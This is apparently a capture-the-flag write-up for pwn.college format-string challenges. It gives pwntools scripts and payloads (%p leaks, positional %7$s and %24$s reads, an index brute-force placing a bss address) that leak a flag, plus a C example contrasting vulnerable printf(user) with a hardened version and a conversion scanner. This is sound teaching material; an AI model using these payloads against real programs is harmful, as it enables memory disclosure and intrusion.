
Format Strings Exploit

level1.0 & level1.1

%p prints 8 bytes: on this 64-bit target each %p consumes one pointer-sized argument slot, so a run of them dumps consecutive words from the stack.

```python
from pwn import *

p = process('/challenge/babyfmt_level1.0')

p.recvuntil(b'Send your data!')
# 16 back-to-back %p conversions: each one leaks one 8-byte argument slot
payload = b'%p' * 16
p.sendline(payload)
p.recvuntil(b'I will now call printf on your data!\n\n')

# drop the (nil) slots, then split the remaining values on their 0x prefix
line = p.recvline().decode().strip()
for x in line.replace('(nil)', '').split('0x'):
    if not x:
        continue
    try:
        # each value is a little-endian 8-byte word, so re-serialise it
        # little-endian to read the characters in their original order
        print(int(x, 16).to_bytes(8, 'little').decode('utf-8').rstrip('\x00'), end='')
    except (ValueError, UnicodeDecodeError):
        pass  # not valid hex, or the word is not printable text

p.interactive()
```

level2.0

  • We know the address where the secret is stored; call it addr
  • Give a string of space-separated %p as input, as in level1: "%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p"
  • In the output, note the position at which addr is printed, say the 7th parameter
  • Run the program again and now give the input %7$s, which dereferences that slot and prints the secret as a string

level2.1

  • Here, we don't know the address of the secret
  • Replace each %p whose printed value looks like a memory address with %s, so that slot is dereferenced instead of printed:

    ```text
    in:  %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p
    out: 0x7881a8a0f723 (nil) 0x7881a8930297 0xa 0x25 0xfffffffffffffff8 0x7fffef602e70 (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil)

    in:  %s %p %s %p %p %p %s
    out:  (nil) H= 0xa 0x25 0xfffffffffffffff8 IXWEYCSPCCAUMXQ
    ```
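The reads in levels 1 and 2 work only because the program passes the user's input straight to printf as the format string, so every %p or %s consumes an argument slot the caller never supplied. The following C snippet is an added example, not code from the pwn.college challenge binaries (whose source is not on this page): it puts the vulnerable pattern next to the hardened one and adds a small scanner for untrusted text that is about to be used in logging. All function names and the sample inputs are made up for the example; the compiler check a reviewer would want is gcc -Wformat -Wformat-security (or -Werror=format-security), which flags the vulnerable call below.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern: untrusted data used as the format itself. Every %p, %s
 * or %n inside `user` is interpreted and consumes a stack/register slot the
 * caller never passed. Shown only for the shape of the bug; never called. */
void log_vulnerable(const char *user)
{
    printf(user); /* gcc -Wformat-security warns: format not a string literal */
}

/* Hardened pattern: the format is a constant and the user's text is an
 * argument. "%p %7$s" in `user` is printed literally, not interpreted. */
int log_hardened(char *out, size_t outlen, const char *user)
{
    return snprintf(out, outlen, "%s", user);
}

/* Defensive check for code that cannot be refactored immediately: count the
 * conversion directives in untrusted text ("%%" is an escaped percent, not a
 * conversion) and flag %n, the conversion that writes to memory. Positional
 * forms such as %7$s and length-modified forms such as %hhn count as one. */
typedef struct {
    int conversions;
    bool has_write; /* saw %n */
} fmt_report;

fmt_report scan_format(const char *s)
{
    fmt_report r = {0, false};
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') { /* "%%": literal percent sign */
            p++;
            continue;
        }
        r.conversions++;
        /* skip flags, width, precision, positional index ('$') and length
         * modifiers until the conversion character itself */
        const char *q = p + 1;
        while (*q && strchr("0123456789$#-+ .'hlLqjzt*", *q))
            q++;
        if (*q == 'n')
            r.has_write = true;
        if (!*q)
            break;
        p = q; /* resume scanning after the conversion character */
    }
    return r;
}

int count_conversions(const char *s) { return scan_format(s).conversions; }
bool has_write_conversion(const char *s) { return scan_format(s).has_write; }
bool format_is_safe(const char *s) { return scan_format(s).conversions == 0; }

/* true when the hardened logger reproduces the untrusted text unchanged */
bool echoes_literally(const char *user)
{
    char buf[128];
    log_hardened(buf, sizeof buf, user);
    return strcmp(buf, user) == 0;
}

int main(void)
{
    /* constructed sample inputs; the first two mirror the level 2 payloads */
    const char *samples[] = { "%p %p %p %p", "%7$s", "%hhn", "100%% done", "hello" };
    char buf[128];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        fmt_report r = scan_format(samples[i]);
        log_hardened(buf, sizeof buf, samples[i]);
        printf("input=%-12s conversions=%d write=%d echoed=%s\n",
               samples[i], r.conversions, (int)r.has_write, buf);
    }
    return 0;
}
```

Rejecting input with format_is_safe() is a stop-gap for legacy call sites; the real fix is the log_hardened() shape, where no user byte ever reaches the format argument.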

level3.1

  • Given: bss address = 0x404140
  • Put the address (little-endian) at the end of the input and loop over %i$x to find which argument index lands on it:

    ```python
    from pwn import *

    for i in range(1, 100):
        p = process('/challenge/babyfmt_level3.0')
        p.recvuntil(b'Send your data!')

        # %i$x prints argument slot i; the trailing bytes are 0x404140 little-endian
        payload = f'%{i}$x \x40\x41\x40'.encode()
        p.sendline(payload)
        p.recvuntil(b'I will now call printf on your data!\n\n')
        op = p.recvuntil(b'Goodbye!')
        # the slot that holds our address bytes will show 40/41 in its hex dump
        if b"40" in op or b"41" in op:
            print(op, "index:", i)
        p.close()
    ```

    No luck with %x, which only prints the low 4 bytes of each slot. Try looping over %i$lx instead, which prints the full 8-byte slot:

    ```text
    payload = f'%{i}$lx \x40\x41\x40'.encode()

    b'a40414020786c24 @A@\n\n### Goodbye!' index: 23
    ```

    Getting closer. Now pin the index and pad the payload until the whole address sits alone in one slot:

    ```text
    payload = f'%{23}$lx \x40\x41\x40'.encode()

    b'a40414020786c24 @A@\n\n### Goodbye!'

    payload = f'%{23}$lx \x40\x41\x40\x00'.encode()

    b'40414020786c24 @A@\n### Goodbye!'

    payload = f'%{24}$lx AAAA\x40\x41\x40\x00'.encode()

    b'a00404140 AAAA@A@\n### Goodbye!'

    payload = f'%{24}$lx AAAA\x40\x41\x40\x00\x00\x00\x00\x00'.encode()

    b'404140 AAAA@A@\n### Goodbye!'

    payload = f'%{24}$x AAAAA\x40\x41\x40\x00\x00\x00\x00\x00'.encode()

    b'404140 AAAAA@A@\n### Goodbye!'

    payload = f'%{24}$s AAAAA\x40\x41\x40\x00\x00\x00\x00\x00'.encode()

    b'pwn.college{xxxxxxxxxxxxxxxxxxxxxxxx}\n AAAAA@A@\n### Goodbye!'
    ```